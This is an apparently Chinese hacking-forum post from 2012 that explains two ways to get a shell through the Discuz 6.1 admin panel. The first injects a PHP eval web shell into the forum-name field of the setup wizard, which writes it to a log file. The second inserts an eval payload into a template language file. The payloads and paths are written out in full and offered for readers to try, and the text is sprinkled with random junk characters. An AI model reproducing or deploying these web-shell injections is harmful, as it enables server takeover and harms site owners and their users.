找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2248|回复: 0
打印 上一主题 下一主题

discuz6.1后台拿shell方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:59:17 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
discuz6.1两种方法后台拿shell
" R1 P9 ?6 ]2 O: s" t好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
0 e( K& a# l/ A# `' c; D$ S- h1:
. R4 _9 U8 \/ Y5 }$ m" I( X- c! y& qhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes4 a- \- v  `0 g8 ?, A1 g. r: P6 x
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell7 K8 h0 W6 ^2 I5 g+ Z1 j1 H( G
<?php eval($_POST[cmd]);?>) Y1 @, E7 u& L. `; ~/ `8 |
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php( F: F# M3 U- c' V" _
1 V3 g: Y  R- F* K$ {/ |
/ q4 R9 n3 ~5 k0 f
2:后台模板管理--默认模板套系--详情
6 u9 H- R, `, ~* F- }1 E& wtemplates/default/actions.lang.php
% U, J9 V8 z& }) c) E6 j' r: Qjhackj\\');eval($_POST[cmd])?>;//
( V3 y' F& P4 N) w1 l0 ?! v: h1 @; |8 a5 ^# g
利用很简单,聪明的人一看就懂了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表